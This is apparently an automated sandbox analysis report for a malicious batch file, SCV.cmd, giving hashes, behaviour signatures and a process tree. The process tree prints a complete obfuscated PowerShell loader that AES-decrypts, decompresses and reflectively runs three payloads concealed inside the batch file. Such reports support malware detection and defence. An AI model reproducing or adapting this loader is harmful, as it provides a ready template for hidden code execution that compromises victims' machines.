Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
19-10-2024 09:25
General
-
Target
SCV.cmd
-
Size
537KB
-
MD5
d20bf8dba792e2edc3e0eb7e5c30b32b
-
SHA1
7094e6e59004962f3d3161aa3016ecfcf2b3a64f
-
SHA256
1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485
-
SHA512
c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f
-
SSDEEP
12288:100ynYtHxuu7eaSvaoBTiFrrdkrw1vH5FiaPQdgEMlB:10KtR3lehBAr/1vian1B
Score
3/10
Malware Config
Signatures
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\SCV.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SCV.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB